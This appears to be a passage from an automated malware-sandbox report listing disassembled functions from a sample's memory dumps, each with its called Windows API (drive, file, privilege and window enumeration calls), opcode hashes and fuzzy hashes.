                                                    • Opcode Fuzzy Hash: 99c67effe42a67efcf2e4251703bfd2e419014049504012bf1c743c0211dfe4c
                                                    • Instruction Fuzzy Hash: 7D21A4725047809FEB22CF25DC85B96FFF4EF06220F0884AEED858B563D235A448DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB0F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 01DB0FB0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: b12d504233efffa5360f4892d2882477c599ed802de86b97115f86e77bd42d42
                                                    • Instruction ID: 6bd2f1a7d82f1060d64535555feee809fd4dafd2df19ecd58d1c6712d5742b62
                                                    • Opcode Fuzzy Hash: b12d504233efffa5360f4892d2882477c599ed802de86b97115f86e77bd42d42
                                                    • Instruction Fuzzy Hash: BB218E7260D3C09FDB138B25CC95B92BFB4AF07214F0C84DAE9898F253D2649408C762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    • Opcode ID: 0803c16b5b707eccceb5b83b72ff365ad2b49ccfa37b5024b31cbfb0f477e4b4
                                                    • Instruction ID: 807f7ae474999243cf134b0f614a3691b095d3a3e81d25d7d07c0bdb3e777190
                                                    • Opcode Fuzzy Hash: 0803c16b5b707eccceb5b83b72ff365ad2b49ccfa37b5024b31cbfb0f477e4b4
                                                    • Instruction Fuzzy Hash: 3921A1725093C09FEB128B25DC55B92BFB4EF07320F0984DBDD858F263D228A908DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0037AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: c321e9a2af7b5554459b21b16d2a674e05c271dcd54e1de8ae0a0e9ee58c7b76
                                                    • Instruction ID: 217513ba16991d8b41da103047bb92efb8d5d725e11c7a23cc0aae247cf56172
                                                    • Opcode Fuzzy Hash: c321e9a2af7b5554459b21b16d2a674e05c271dcd54e1de8ae0a0e9ee58c7b76
                                                    • Instruction Fuzzy Hash: 2521A2716053809FD722CF25CC44B56BFA8EF56210F0884AAED49CB252D265E808CB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB10D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 01DB1148
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: 87201b3f183fbb4126ec4e632998a53de021b48f904bf65064c96b7f6297ae12
                                                    • Instruction ID: 5cde9b1fc86949a0f952e37d78753609d081635b592c1da53a9ce01eb6c7ad4f
                                                    • Opcode Fuzzy Hash: 87201b3f183fbb4126ec4e632998a53de021b48f904bf65064c96b7f6297ae12
                                                    • Instruction Fuzzy Hash: 86216D6150D3C09FD7138B259C64AA2BFB4EF57620F0981DBDC858F2A3D2696808D772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,70D6F4DC,00000000,00000000,00000000,00000000), ref: 0037AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: f1704b4de2827635e58eba553863f1f5cbdf2458aa915bdd3eacd7e255dff9bb
                                                    • Instruction ID: fc74159ca7e2bd57f577d7b5de8fa84459e2933ab6482cea02cab2f9c439bcf5
                                                    • Opcode Fuzzy Hash: f1704b4de2827635e58eba553863f1f5cbdf2458aa915bdd3eacd7e255dff9bb
                                                    • Instruction Fuzzy Hash: B9110471500700EFEB21DF15DC45BABFBA8EF44320F14C46AED09DA641C774A9048BB2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0037BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 113df9abd88669127de95a3edd804b4c5f1b39fa7818fd98bebb1b1697ebe2cc
                                                    • Instruction ID: 24b4d3b431c286a0fe9e6fe8cb81fdb040632b364bd32337d8e4050728ce9a35
                                                    • Opcode Fuzzy Hash: 113df9abd88669127de95a3edd804b4c5f1b39fa7818fd98bebb1b1697ebe2cc
                                                    • Instruction Fuzzy Hash: C3119D72504380AFDB22CF65CC44B53FFF4EF05210F09849AE9898B662D375A818CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB0886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,70D6F4DC,00000000,00000000,00000000,00000000), ref: 01DB08E5
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: f0754d126e9daed6abf3083d4771eaa1ea7201dd2829f8ee5100877bf1d190ca
                                                    • Instruction ID: 8630c6993cfe0e229b27dc6e41fbe870f542fc8c191a737569514debdc5b475d
                                                    • Opcode Fuzzy Hash: f0754d126e9daed6abf3083d4771eaa1ea7201dd2829f8ee5100877bf1d190ca
                                                    • Instruction Fuzzy Hash: 0D11C172500700EFFB21DF55DC85FA7FBA8EF04720F08855AFD4A9A652C675A5088BB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    • Opcode ID: 31340e7da873e1bdb277c49d4ddfe26368177c692175391037595cdb5cf2f095
                                                    • Instruction ID: 2fc04e6db44d6ec9991a87ac41ff502b8a37b88bfcbba23764b740411ac2b2fa
                                                    • Opcode Fuzzy Hash: 31340e7da873e1bdb277c49d4ddfe26368177c692175391037595cdb5cf2f095
                                                    • Instruction Fuzzy Hash: E1118F715093C09FE7228F15DC54AA2BFB4DF47614F0880CAEDC48F253D265A808DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB12D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 01DB132F
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: 477ee88f34ffb37a44dc236c6df12f8d1c02f175386d5f6f028eaaad5b5a2897
                                                    • Instruction ID: f8f359ede7e47ffa0bd1e627759947374aa6c2ad1c42e7fa1963514ab9b4c790
                                                    • Opcode Fuzzy Hash: 477ee88f34ffb37a44dc236c6df12f8d1c02f175386d5f6f028eaaad5b5a2897
                                                    • Instruction Fuzzy Hash: FA1191715093849FDB128F25DC95B96FFA4EF06220F0984EEED858B653D275A808CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB05E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 01DB0640
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: 2eda544e8f9b9b269b8db0db62bf368bdf74beae88ca5c105be5800668155436
                                                    • Instruction ID: 304af9bbf003e6ff519efcc468db59cef870e0f1568081370095e69b79383edc
                                                    • Opcode Fuzzy Hash: 2eda544e8f9b9b269b8db0db62bf368bdf74beae88ca5c105be5800668155436
                                                    • Instruction Fuzzy Hash: 571102715093C09FDB128B15DC84B92FFB4EF06220F0880DBED868B663D264A808CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0037AA71
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: ead9d8c7bb52b3bb60b31d6ec382f01e3968aef9ea63b150e9bc7b9c4485ba40
                                                    • Instruction ID: 200ad907b6016901ccc789b67de88ef872a6887b0d09acd354c9f056cfee4469
                                                    • Opcode Fuzzy Hash: ead9d8c7bb52b3bb60b31d6ec382f01e3968aef9ea63b150e9bc7b9c4485ba40
                                                    • Instruction Fuzzy Hash: 4B11C17540D7C09FD7128B11DC85A92BFA0EF13320F0A80DBDD888F163D268A909C762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0037AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 4cdd75aa7e5d1cbb79d735410704039f76feaebf87cf7d7554b39f6d5c1d10eb
                                                    • Instruction ID: 722c6b80e958b6d550f9ed1bf6c2bf8c7424858d7fe9ff144a8ebeb6a606cb3d
                                                    • Opcode Fuzzy Hash: 4cdd75aa7e5d1cbb79d735410704039f76feaebf87cf7d7554b39f6d5c1d10eb
                                                    • Instruction Fuzzy Hash: 9A113CB16007009FEB21DF25DC85B5AFB98EB54621F08C46AED49CB642D674E804CA62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 01DB099C
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: be4f675fc656a9416f5c564f12c8aa2fe2d24b799b66fcf5feec916fde2a931d
                                                    • Instruction ID: 1ffac75f3dbd9639636c1ceb2bd5e7c03c41807e84e1cb2607490120b5c870fe
                                                    • Opcode Fuzzy Hash: be4f675fc656a9416f5c564f12c8aa2fe2d24b799b66fcf5feec916fde2a931d
                                                    • Instruction Fuzzy Hash: 5C1190715097C09FE7128B25DC55B92BFB4EF07324F0980DADD854B163C265A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB07C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,70D6F4DC,00000000,00000000,00000000,00000000), ref: 01DB0819
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: c106939edb74f94dc3a1b7212e9bef960d4aed3c22a3a9ff6487b1762b618f81
                                                    • Instruction ID: f2fa3a3c5f536e379e130acbe61cf702ce03cdfbc01d467edb23cf7e190b03f9
                                                    • Opcode Fuzzy Hash: c106939edb74f94dc3a1b7212e9bef960d4aed3c22a3a9ff6487b1762b618f81
                                                    • Instruction Fuzzy Hash: 5F01C475500704EFFB209F05DC85BA7FBA8DF04720F14C096FD4A9A242D678AA048AA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB13AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: c74ae8dcb188bd8bdcd7d316dc7a258d0e92bf8cd0d35426f2f98a462d1a2921
                                                    • Instruction ID: 3e69608958f64c6c66e731cbbef7ee617819c76eda9b60e3a586aa61a3521d47
                                                    • Opcode Fuzzy Hash: c74ae8dcb188bd8bdcd7d316dc7a258d0e92bf8cd0d35426f2f98a462d1a2921
                                                    • Instruction Fuzzy Hash: 6B11A176500700DFEB21DF56EC85BA6FBA4EF04220F08C4AEDD4A8B652D675E408CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0037ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: d2da3d21670ae068754fd6d3b983aced4626e9d729fcd9d5d9690884aa88c413
                                                    • Instruction ID: cd886c575ea4ab08e2601ed565821ca22b619e655662646a95b809fade07fb5a
                                                    • Opcode Fuzzy Hash: d2da3d21670ae068754fd6d3b983aced4626e9d729fcd9d5d9690884aa88c413
                                                    • Instruction Fuzzy Hash: 3811A0B55097849FDB11CF65DC85B82BFA4EB52320F0A80ABDD488F153D274A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0037BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: f3b6d0359e0ac53be406916a535df990f33bcede53af27df367fe5be92d1868e
                                                    • Instruction ID: b8ce30bda99fde52d8203177386d1b78ed96acaa39eaa4fbd88bd899302c31ce
                                                    • Opcode Fuzzy Hash: f3b6d0359e0ac53be406916a535df990f33bcede53af27df367fe5be92d1868e
                                                    • Instruction Fuzzy Hash: 08115A72500700DFDB71DF55D844B52FBE4EB14310F08C5AADD898AA12D375E418DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnumWindows.USER32(?,00000E9C,?,?), ref: 0037A23E
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    • String ID:
                                                    • API String ID: 1129996299-0
                                                    • Opcode ID: cdb8f7319c00643e15f46cdbc7a83c5bc7e2ff29755e9ea49bd85a73ae2d9273
                                                    • Instruction ID: 906d5a246fad1319ad6a43ee4df810aef1e6967a84d5a8938c1ab5e3b84cf7ea
                                                    • Opcode Fuzzy Hash: cdb8f7319c00643e15f46cdbc7a83c5bc7e2ff29755e9ea49bd85a73ae2d9273
                                                    • Instruction Fuzzy Hash: A4018471900700AFE310DF16DC46B66FBA8FB84A60F14816AED089B741D735F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 01DB109E
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: 6984ec3ec740277e07a60f75703ba4169e4bc028f1b38e59149a18551eb1f9f0
                                                    • Instruction ID: d98d4300139e2c5d0a3b729fd2f63b08c530847bcf3850698f1a7f2d8b717f2f
                                                    • Opcode Fuzzy Hash: 6984ec3ec740277e07a60f75703ba4169e4bc028f1b38e59149a18551eb1f9f0
                                                    • Instruction Fuzzy Hash: 4A017171900700AFE310DF16DC46B66FBA8FB84A60F14816AED089B741D735B515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB0196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 01DB01D0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 356f684653d9730019ae12ff4000b7149597ba9a5334fe95691840736d4b4aa9
                                                    • Instruction ID: 135335712dd36f2dea74bf23732bf51b52ca902292dbee6034a95cfb7ea4b5fc
                                                    • Opcode Fuzzy Hash: 356f684653d9730019ae12ff4000b7149597ba9a5334fe95691840736d4b4aa9
                                                    • Instruction Fuzzy Hash: 66015E71600744DFEB10DF69DCC57A6FBA8DB05660F08C5AAED4ACB642D674E408CA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    • Opcode ID: 7ca9d1eb85d1030299cea9f4c0d6c28f4570d4bf4deff37bf9c913c0776a1707
                                                    • Instruction ID: ab561cc96a4b5a6017b88adc22286c42a8b969638917987fecd8ce894212b000
                                                    • Opcode Fuzzy Hash: 7ca9d1eb85d1030299cea9f4c0d6c28f4570d4bf4deff37bf9c913c0776a1707
                                                    • Instruction Fuzzy Hash: 1C01DF71500300DFEB21CF15DC857A6FBA4EF04720F08C4AADD498B656D779A808CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB12FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 01DB132F
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: 6f55bf7355681fa74b840053eccf1a1d97e31fa62f110b389da65adda03171a3
                                                    • Instruction ID: c175fd5c162522f6abb16ef323c35bdc94d4b136c1964b3c778a91493871056f
                                                    • Opcode Fuzzy Hash: 6f55bf7355681fa74b840053eccf1a1d97e31fa62f110b389da65adda03171a3
                                                    • Instruction Fuzzy Hash: 2D01DF71505300DFEB10DF19EC857AAFBA4EF04620F08C4AADD4A8BB42E675E408CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0037A94A
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: d6403132f370732054aa854c406cceec459f9ac58dd442bee37b157f2185b2d1
                                                    • Instruction ID: cd8fbaee07acf67bbbc1dbb1bb9bcc6f7d6de79f6e3e1d4fe60907a3bcd9304c
                                                    • Opcode Fuzzy Hash: d6403132f370732054aa854c406cceec459f9ac58dd442bee37b157f2185b2d1
                                                    • Instruction Fuzzy Hash: 1F016271900700AFD310DF16DC46B26FBA4FB88B20F14825AED085B741D675F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB0F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 01DB0FB0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: e04e149866fb87103cbca0d0a0ab4fd0cc6a661db437872b0f3c0bec807c7f67
                                                    • Instruction ID: 7f301b72f2d8aaf0ec45989109d2a7cc102e1d364708779f8029375ef45c7bb6
                                                    • Opcode Fuzzy Hash: e04e149866fb87103cbca0d0a0ab4fd0cc6a661db437872b0f3c0bec807c7f67
                                                    • Instruction Fuzzy Hash: DA018472600344DFEB10DF19D885796FBA4DF08660F48C4AAED4ACF246D774E408CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB04B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 01DB0502
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: c1c75b46ed33143bbc627475a03fe4008ebcc50eb9165d8ac653de04c2330e63
                                                    • Instruction ID: 97e3fe1fa5c5eb02bb03f105b2abf93ac64fa27d279135b847150668595f6731
                                                    • Opcode Fuzzy Hash: c1c75b46ed33143bbc627475a03fe4008ebcc50eb9165d8ac653de04c2330e63
                                                    • Instruction Fuzzy Hash: A5016271900700AFD310DF16DC46B26FBA4FB88B20F14825AED085B741D675F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 01DB0640
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: 9721d416b784ea27b3d166ac2b33544cffd5a9619342148999aef10580d145f9
                                                    • Instruction ID: 1804334d03a6902ce83904f01bc66693c88120aa8f1a44ed32b4810225082fc2
                                                    • Opcode Fuzzy Hash: 9721d416b784ea27b3d166ac2b33544cffd5a9619342148999aef10580d145f9
                                                    • Instruction Fuzzy Hash: 9D01F435600700CFEB108F19D8C57A6FBA4EF45620F18C0AAED4B8B752D674E408CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0037ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: b49c513b2db9f612221eb8d10ffd1c9bb4cd2eeb3daeb9a270229a817c3ff793
                                                    • Instruction ID: 55c23b28a52d9fb8e291e4a609c28bc25e8190ce28e76ff86cf557fe71795158
                                                    • Opcode Fuzzy Hash: b49c513b2db9f612221eb8d10ffd1c9bb4cd2eeb3daeb9a270229a817c3ff793
                                                    • Instruction Fuzzy Hash: 5901D131504B44DFEB21DF55DC85796FB94DF40320F18C0AADD0C8F602D678A408CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB1116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 01DB1148
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: 1be4e09af0ebd3f9726f6db23c8298180c16df5c713d2dc9a6fd25775aa4c777
                                                    • Instruction ID: 4de3bdacd079a602a53131af72e0a72b7993a6c3c2726837b48ae6a2c56f66e8
                                                    • Opcode Fuzzy Hash: 1be4e09af0ebd3f9726f6db23c8298180c16df5c713d2dc9a6fd25775aa4c777
                                                    • Instruction Fuzzy Hash: B4F0FF34500740DFEB20CF05E8C57A6FBA0EF05A61F08C29ACD4A4B712C675E448CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    • Opcode ID: 4a26c59c31c9d60594d17aff2310c963e0be549244e3b8ec06c570a64b364e28
                                                    • Instruction ID: fb8a4dd30791947e2444e8c3aeb06cf2c80a71311a0590898acb235748b8cf9e
                                                    • Opcode Fuzzy Hash: 4a26c59c31c9d60594d17aff2310c963e0be549244e3b8ec06c570a64b364e28
                                                    • Instruction Fuzzy Hash: 2EF0AF39504B40DFEB219F05D885769FBA4EF44721F18C09ADD494B752D379A808DAA3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0037AA71
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: 9dba5a192af320ab839fa8f8156ad52acc42eff55f893bf71627835250fdbe94
                                                    • Instruction ID: 0a90b2356b2b4cc14c00e11bcd6d56fc43e28183a2a90b8f055aebdd790c5143
                                                    • Opcode Fuzzy Hash: 9dba5a192af320ab839fa8f8156ad52acc42eff55f893bf71627835250fdbe94
